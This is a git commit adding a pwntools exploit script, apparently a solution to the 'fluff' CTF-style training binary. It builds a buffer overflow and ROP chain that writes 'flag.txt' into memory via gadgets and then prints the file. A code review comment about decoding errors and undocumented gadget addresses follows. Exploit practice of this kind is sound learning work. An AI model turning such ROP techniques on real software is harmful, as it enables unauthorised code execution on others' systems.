From 4c25bd918847e914875e900285008eb3865ca8b6 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Thu, 17 Dec 2020 19:39:54 -0600
Subject: new file: x86_64/fluff/exploit.py new file: x86_64/fluff/gadgets
---
x86_64/fluff/exploit.py | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 49 insertions(+)
create mode 100755 x86_64/fluff/exploit.py
(limited to 'x86_64/fluff/exploit.py')
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
--
cgit v1.2.3
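Review bot: `print(str(prog.recv(), 'UTF-8'))` near the end of the hunk raises UnicodeDecodeError on the first non-UTF-8 byte the target emits (easy to hit when the output includes leaked memory or a truncated flag buffer), which kills the script before `prog.interactive()` ever runs; use `print(prog.recv().decode('utf-8', errors='replace'))` or drop the print and let `interactive()` show the output. The gadget addresses and constants in `write_str` (0x4006a3, 0x40062a, 0x4000, 0x3ef2, 0x400610, 0x400628, 0x400639) and the write target `0x600df0 + 0xdf0` are bare magic numbers with no comment saying which instruction sequence each one is; the commit subject names a `gadgets` file that is not in this view, so give each address a module-level constant with a one-line comment (the `# set rdi` comment suggests `POP_RDI = 0x4006a3  # pop rdi; ret`, the rest I cannot identify from here) so the chain can be audited against the binary. This rendering has lost the indentation, so it cannot be told whether the three gadget pushes after the `for c in string:` loop sit inside it; if they are outside, only one byte of `string` is ever stored, which is worth confirming against the checked-in file. The `for c in range(40): payload += b'a'` prelude is simply `payload = b'a' * 40`.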